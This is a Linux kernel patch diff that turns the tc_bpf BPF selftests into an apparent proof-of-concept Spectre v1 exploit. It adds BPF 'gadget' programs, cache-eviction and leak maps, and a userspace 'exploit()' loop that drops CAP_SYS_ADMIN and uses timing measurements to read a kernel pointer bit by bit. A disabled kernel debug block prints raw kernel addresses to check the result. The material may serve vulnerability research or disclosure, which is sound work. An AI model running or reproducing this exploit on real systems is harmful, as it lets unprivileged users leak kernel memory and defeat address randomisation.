diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c index 382c7a71f81f2d4ce63d3321e584e7ea3cd9218e..ef36ebca3b1123de8309889838e024cd5212b741 100644 --- a/net/sched/cls_bpf.c +++ b/net/sched/cls_bpf.c @@ -99,6 +99,28 @@ TC_INDIRECT_SCOPE int cls_bpf_classify(struct sk_buff *skb, __skb_push(skb, skb->mac_len); bpf_compute_data_pointers(skb); filter_res = bpf_prog_run(prog->filter, skb); + +#if 0 + // Print after program to not mess with the cache. + static atomic_t init = ATOMIC_INIT(0); + if (unlikely(skb_headlen(skb) == 170 && atomic_inc_return(&init) == 1)) { + barrier_nospec(); + struct bpf_skb_data_end *cb = (struct bpf_skb_data_end *)skb->cb; + pr_err_ratelimited( + "skb = %px, skb_headlen(skb) = %d\n" + "data *(%px) = %px\n" + "data_end *(%px) = %px\n" + "kernel skb_shinfo(skb)->frags[0].bv_page\n\t*(%px ?= data+366 = %px) = %px\n", + skb, skb_headlen(skb), + &(skb->data), skb->data, + &(cb->data_end), cb->data_end, + &skb_shinfo(skb)->frags[0].bv_page, + ((char *) skb->data) + 366, + skb_shinfo(skb)->frags[0].bv_page + ); + } +#endif + __skb_pull(skb, skb->mac_len); } else { bpf_compute_data_pointers(skb); diff --git a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c old mode 100644 new mode 100755 index 48b55539331ee54130aa37e2b6103634d24c4d10..ec82e95895b52bdb12e320e8d2e6094c85f1537d --- a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c +++ b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c @@ -2,6 +2,8 @@ #include <test_progs.h> #include <linux/pkt_cls.h> +#include <arpa/inet.h> +#include <sys/socket.h> #include "cap_helpers.h" #include "test_tc_bpf.skel.h" @@ -395,6 +397,251 @@ void tc_bpf_root(void) test_tc_bpf__destroy(skel); } +static void die(char *s) +{ + perror(s); + exit(1); +} + +#define SERVER "127.0.0.1" +#define BUFLEN (128 * 1024) +#define PORT 8888 + +static int client(struct sockaddr_in *si_other) { + static int s = -1; + if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { + die("socket"); + } + + memset((char *) si_other, 0, sizeof(si_other)); + si_other->sin_family = AF_INET; + si_other->sin_port = htons(PORT); + + if (inet_aton(SERVER , &si_other->sin_addr) == 0) { + fprintf(stderr, "inet_aton() failed\n"); + exit(1); + } + + return s; +} + +static int server(void) { + struct sockaddr_in si_me; + int s; + + if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { + die("socket"); + } + + memset((char *) &si_me, 0, sizeof(si_me)); + + si_me.sin_family = AF_INET; + si_me.sin_port = htons(PORT); + si_me.sin_addr.s_addr = htonl(INADDR_ANY); + + if (bind(s, (struct sockaddr *) &si_me, sizeof(si_me)) == -1) { + die("bind"); + } + + return s; +} + +static int client_ping(int s, struct sockaddr_in *si_other, size_t n) { + unsigned int slen = sizeof(*si_other); + static char message[BUFLEN] = {}; + memset(message, 0x37, n); + + if (sendto(s, message, n, 0, (struct sockaddr *) si_other, slen) == -1) { + die("sendto()"); + } + + return 0; +} + +#define CAT(a, b, d, c) a ## b ## d ## c +#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2) + +#define EI_MASK(BYTE, MASK) \ + else if (offset == BYTE && mask == MASK) fd = bpf_program__fd(skel->progs.NAME(BYTE, MASK)); + +#define EI_BYTE(BYTE) \ + EI_MASK(BYTE, 1) \ + EI_MASK(BYTE, 2) \ + EI_MASK(BYTE, 4) \ + EI_MASK(BYTE, 8) \ + EI_MASK(BYTE, 16) \ + EI_MASK(BYTE, 32) \ + EI_MASK(BYTE, 64) \ + EI_MASK(BYTE, 128) + +static int exploit(struct test_tc_bpf *skel, long long *skipped, long long *total, + long long *t0, long long *t1, int offset, int mask) { + DECLARE_LIBBPF_OPTS(bpf_tc_hook, hook, .ifindex = LO_IFINDEX, .attach_point = BPF_TC_INGRESS); + + int fd; + if (offset == 350 && mask == 1) fd = bpf_program__fd(skel->progs.pkt_ptr_350_1); + EI_BYTE(366) + EI_BYTE(367) + EI_BYTE(368) + EI_BYTE(369) + EI_BYTE(370) + EI_BYTE(371) + EI_BYTE(372) + EI_BYTE(373) + else { + errno = EINVAL; + die("mask/offset"); + } + + DECLARE_LIBBPF_OPTS(bpf_tc_opts, opts, .prog_fd = fd); + int ret; + + ret = bpf_tc_hook_create(&hook); + ret = ret == -EEXIST ? 0 : ret; + if (ret) { + errno = -ret; + perror("hook create"); + if (!ASSERT_OK(ret, "bpf_tc_hook_create(BPF_TC_INGRESS)")) + goto destroy; + } + + ret = bpf_tc_attach(&hook, &opts); + if (ret) + if (!ASSERT_OK(ret, "bpf_tc_attach")) + goto end; + + int ss = server(); + struct sockaddr_in si_server; + int cs = client(&si_server); + + client_ping(cs, &si_server, 16*1024); // make it set bv_page != 0 + +#define LEAKMAP_ENTRIES (5 * 512) + + for (__u32 i = 0; i < LEAKMAP_ENTRIES; i += 512) { + __u32 key = i; + __s64 value = -i; + ret = bpf_map__update_elem(skel->maps.leakmap, + &key, sizeof(key), + &value, sizeof(value), 0); + if (ret) { + if (!ASSERT_OK(ret, "init_leak")) + goto end; + } + } + +// for 128KiB L1d, 90MiB L3, 1536-entry sltlb +#define EVICTMAP_ENTRIES (8 * 128 * 1024) + for (__u32 i = 0; i < EVICTMAP_ENTRIES; i += 8) { + __u32 index = i / 8; + __u32 key = i + (index % 8); + __u64 value = i; + ret = bpf_map__update_elem(skel->maps.evictmap, &key, sizeof(key), &value, sizeof(value), 0); + if (ret) { + if (!ASSERT_OK(ret, "init_evict")) + goto end; + } + } + + long long n = 0; +#define T 8 +#define N 8 + long long i; + for (i = 0; n < N; i++) { + // Branch prediction using PHT will be wrong unless it knows rand(). + int t = rand() % T; + for (int j = 0; j < t; j++) { + client_ping(cs, &si_server, 512); + } + client_ping(cs, &si_server, 128); // + 42 byte header + +#define X 4 + __s64 delta[X]; + for (size_t j = 0; j < X; j++) { + __u32 key[X] = {0, 512, 1536, 1024}; + ret = bpf_map__lookup_elem(skel->maps.leakmap, &key[j], sizeof(key[j]), + &delta[j], sizeof(delta[j]), 0); + if (ret) { + if (!ASSERT_OK(ret, "delta lookup")) + goto end; + } + if (delta[j] <= 0) { + ASSERT_OK(-1, "delta not written by bpf program"); + } + } + + __u32 key = 2048; + __u64 err; + ret = bpf_map__lookup_elem(skel->maps.leakmap, &key, sizeof(key), &err, sizeof(err), 0); + if (ret) { + if (!ASSERT_OK(ret, "err lookup")) + goto end; + } + static bool first = true; + if (err && first) { + first = false; + ASSERT_OK(-err, "bpf"); + } + + if (i == 2 * 2 * N) { + // reload and retry + ret = -1; + // fprintf(stderr, "i: timeout after %lld reps\n", i); + break; + } + + // sometimes everything is still in the cache + if (!((delta[3] < delta[2]))) { + // fprintf(stderr, "skip: uncached\t%lld, cached\t%lld, 0\t%lld, 1\t%lld\n", delta[2], delta[3], delta[0], delta[1]); + continue; + } + + if (delta[0] > delta[1]) + *t0 += 1000; + else + *t1 += 1000; + n++; + } + + *skipped += i-n; + *total += i; + + if (n > 0) { + *t0 /= n; + *t1 /= n; + } + + __u32 key = 0; + __u64 value; + int ret2 = bpf_map__lookup_elem(skel->maps.evictmap, + &key, sizeof(key), + &value, sizeof(value), 0); + if (ret2) { + if (!ASSERT_OK(ret2, "lookup")) + goto end; + } + if (value > i*T) { + ASSERT_OK(-1, "BUG value > i*T"); + goto end; + } + +end: + close(ss); + close(cs); + + opts.prog_fd = opts.prog_id = 0; + ret2 = bpf_tc_detach(&hook, &opts); + if (ret2) + ASSERT_OK(ret2, "bpf_tc_detach"); + +destroy: + ret2 = bpf_tc_hook_destroy(&hook); + if (ret2) + ASSERT_OK(ret2, "bpf_tc_hook_destroy"); + + return ret; +} + void tc_bpf_non_root(void) { struct test_tc_bpf *skel = NULL; @@ -409,11 +656,90 @@ void tc_bpf_non_root(void) if (!ASSERT_OK(ret, "disable_cap_sys_admin")) goto restore_cap; - skel = test_tc_bpf__open_and_load(); - if (!ASSERT_OK_PTR(skel, "test_tc_bpf__open_and_load")) - goto restore_cap; + libbpf_set_print(NULL); + +#define O 1 + for (int k = 0; k < O; k++) {// to test reproducibility + + // Must match generated pkt_ptr programs in test_tc_bpf.c and exploit() + // function. + __u64 base_byte = 366; + + long long skipped = 0; + long long total = 0; + long long bad_loads = 0; + long long total_loads = 0; + __u64 qw = 0; + + for (__u64 byte = 0; byte < 8; byte++) { + for (__u64 bit = 0; bit < 8; bit++) { + + long long dmax = INT_MIN; + long long dmin = INT_MAX; + long long d = 0; + long long m = 0; +#define M 8 + int j = 0; + for (j = 0; true; j++) { + total_loads += 1; + skel = test_tc_bpf__open_and_load(); + if (skel) { + long long t0 = 0, t1 = 0; + + ret = exploit(skel, + &skipped, &total, + &t0, &t1, + base_byte + byte, 1 << bit); + if (ret == -1) { + bad_loads += 1; + goto cleanup; + } + if (ret) + if (!ASSERT_OK(ret, "exploit")) + goto restore_cap; + + if (j == 0) { + goto cleanup; + } + + long long jd = t0 - t1; + dmax = jd > dmax ? jd : dmax; + dmin = jd < dmin ? jd : dmin; + d += jd; + m++; + } + cleanup: + test_tc_bpf__destroy(skel); + + if (j == 64 * M) { + fprintf(stderr, "failed to read bit accurately because of too many consecutive bad loads or inconclusive result, will continue anyway"); + break; + } + + // Continue as long as result is inconclusive. + if (m >= M && (d / m >= 200 || d / m <= -200)) { + break; + } + } + + d /= m; + + fprintf(stderr, "*(data+%lld):%lld = %lld < avg %lld < %lld (ps), j = %d\n", base_byte + byte, bit, dmin, d, dmax, j); + + // little endian + __u64 b = !!(d < 0 ? 0 : 1); + qw |= b << ((byte * 8) + bit); + } + } + fprintf(stderr, "userspace guess for *(u64 *)(data+%lld = data_end+%lld) = 0x%llx\n" + "\t>%lld percent bad samples; %lld percent bad loads\n", + base_byte, base_byte - 42 - 128, qw, + (skipped * 100) / total, + (bad_loads * 100) / total_loads); - test_tc_bpf__destroy(skel); + } + + ASSERT_OK(-1, "exploit"); restore_cap: if (caps) diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf.c b/tools/testing/selftests/bpf/progs/test_tc_bpf.c old mode 100644 new mode 100755 index ef7da419632a2146be37e8a1d271e5d4ac87af29..c5344255ce88eb43241ae4ac6d019e14f03b9b97 --- a/tools/testing/selftests/bpf/progs/test_tc_bpf.c +++ b/tools/testing/selftests/bpf/progs/test_tc_bpf.c @@ -4,6 +4,7 @@ #include <bpf/bpf_helpers.h> #include <linux/if_ether.h> #include <linux/ip.h> +#include "bpf_misc.h" /* Dummy prog to test TC-BPF API */ @@ -13,13 +14,74 @@ int cls(struct __sk_buff *skb) return 0; } -/* Prog to verify tc-bpf without cap_sys_admin and cap_perfmon */ -SEC("tcx/ingress") -int pkt_ptr(struct __sk_buff *skb) -{ - struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr); +/* pkt-ptr-based Spectre v1 gadget */ - if ((long)(iph + 1) > (long)skb->data_end) - return 1; - return 0; +#define LEAKMAP_ENTRIES (5 * 512) + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, LEAKMAP_ENTRIES); + __type(key, __u32); + __type(value, __u64); +} leakmap SEC(".maps"); + +#define L1_SIZE_KiB 128 +#define SIZEOF_CACHELINE 64 +#define EVICTMAP_ENTRIES (8 * 128 * 1024) + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, EVICTMAP_ENTRIES); + __type(key, __u32); + __type(value, __u64); +} evictmap SEC(".maps"); + +static long callback_fn(__u32 index, void *ctx) { +// sizeof(u64) * 8 is one 64-byte cacheline + __u32 key = index * 8 + (index % 8); + __u64 *value = bpf_map_lookup_elem(&evictmap, &key); + if (value) { + *value += 1; + return 0; + } + return 1; } + +#define STRINGIFY(x) #x +#define TOSTRING(x) STRINGIFY(x) +#define CAT(a, b, d, c) a ## b ## d ## c +#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2) + +#define OFFSET 350 +#define MASK 1 +#include "test_tc_bpf_pkt_ptr.h" +#undef OFFSET +#undef MASK + +// 366 = PAYLOAD + 42 + 196 with PAYLOAD=128 +#define OFFSET 366 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 367 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 368 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 369 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 370 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 371 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 372 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 373 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET + +char LICENSE[] SEC("license") = "GPL";